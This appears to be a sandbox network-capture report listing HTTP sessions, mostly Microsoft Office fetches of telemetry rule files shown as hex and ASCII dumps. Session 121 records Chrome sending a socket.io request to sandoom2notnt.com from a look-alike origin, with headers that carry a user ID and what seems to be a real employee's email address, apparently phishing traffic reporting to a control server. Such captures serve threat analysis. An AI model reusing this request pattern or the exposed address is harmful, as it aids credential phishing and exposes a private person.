                                                                              2024-10-26 06:49:42 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              117192.168.2.44987313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:42 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1405
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                              ETag: "0x8DC582BE12B5C71"
                                                                              x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-16849878b78qfbkc5yywmsbg0c00000001eg000000000baz
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:42 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              118192.168.2.44987413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:42 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1368
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                              ETag: "0x8DC582BDDC22447"
                                                                              x-ms-request-id: df5d8003-e01e-0099-48f7-26da8a000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-17c5cb586f69w69mgazyf263an00000000tg000000004r0m
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:42 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              119192.168.2.44987513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:43 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1401
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                              ETag: "0x8DC582BE055B528"
                                                                              x-ms-request-id: 7f6d22c4-101e-0046-21f0-2591b0000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-15b8d89586f8nxpt6ys645x5v000000002tg000000009324
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:43 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              120192.168.2.44987613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:43 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:43 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1364
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                              ETag: "0x8DC582BE1223606"
                                                                              x-ms-request-id: f29ba936-801e-0047-2ef2-247265000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064943Z-r197bdfb6b4d9xksru4x6qbqr000000001gg00000000cw4c
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:43 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              121192.168.2.449877188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:43 UTC689OUTGET /socket.io/?EIO=4&transport=polling&t=PB7bdZX HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Accept: */*
                                                                              Auth_UID: USER09102024U44100921
                                                                              Session_Email: gulamrasul.chepuwala@cevalogistics.com
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:44 UTC813INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:43 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 118
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cache-control: no-store
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktnBJnBKzXM7fPOgWZAkEaLPya2M2X9wovHyp5FGV33CTkr7IRCrtWfX9o2OtcYwyS7Za9dAELSFL2SuGfaWWa1JMtDIrUjbJ1dJeeaSfGv44lekwUbbtim3uQKvsU7nQquwag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d88820ee8469721-AMS
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=123195&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1267&delivery_rate=23503&cwnd=32&unsent_bytes=0&cid=5522513a98126557&ts=505&x=0"
                                                                              2024-10-26 06:49:44 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 4a 4d 68 77 65 6f 49 57 4e 31 67 71 5a 74 48 49 41 41 58 66 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                              Data Ascii: 0{"sid":"JMhweoIWN1gqZtHIAAXf","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              122192.168.2.44987813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:43 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:44 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:43 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1397
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                              ETag: "0x8DC582BE7262739"
                                                                              x-ms-request-id: 9cf5c506-801e-0083-443d-26f0ae000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064943Z-17c5cb586f6wmhkn5q6fu8c5ss0000000130000000001ww4
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              123192.168.2.44987913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:43 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:44 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:43 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1360
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                              ETag: "0x8DC582BDDEB5124"
                                                                              x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064943Z-16849878b78nx5sne3fztmu6xc00000002m000000000b7pm
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:44 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              124192.168.2.44988113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:44 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:44 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:44 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1366
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                              ETag: "0x8DC582BDB779FC3"
                                                                              x-ms-request-id: 22d1952d-101e-007a-6d50-26047e000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064944Z-17c5cb586f6f8m6jnehy0z65x400000000ug00000000cbr1
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:44 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              125192.168.2.44988013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:44 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:44 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:44 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1403
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                              ETag: "0x8DC582BDCB4853F"
                                                                              x-ms-request-id: 7f795d00-001e-0082-463f-265880000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064944Z-15b8d89586fbt6nf34bm5uw08n00000005m0000000003a24
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:44 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              126192.168.2.44988213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:44 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:44 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:44 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1397
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                              ETag: "0x8DC582BDFD43C07"
                                                                              x-ms-request-id: 508e2446-401e-0048-3188-250409000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064944Z-15b8d89586fqj7k5h9gbd8vs9800000002xg000000000yer
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
